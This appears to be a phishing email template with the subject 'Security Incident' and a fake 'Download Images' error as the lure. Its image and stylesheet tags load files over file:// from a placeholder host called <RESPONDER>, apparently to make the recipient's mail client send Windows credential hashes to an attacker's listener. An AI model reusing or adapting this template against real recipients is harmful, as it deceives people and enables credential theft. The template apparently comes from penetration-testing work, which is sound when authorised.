# SENDER: noreply@<domain.com>
# SENDER_NAME: NoReply
# SUBJECT: Security Incident

<p>Error: Click "Download Images" to view this message.</p>
<img src="file://<RESPONDER>/logo.gif" alt="Company Logo">
<link rel="stylesheet" href="file://<RESPONDER>/style.css">
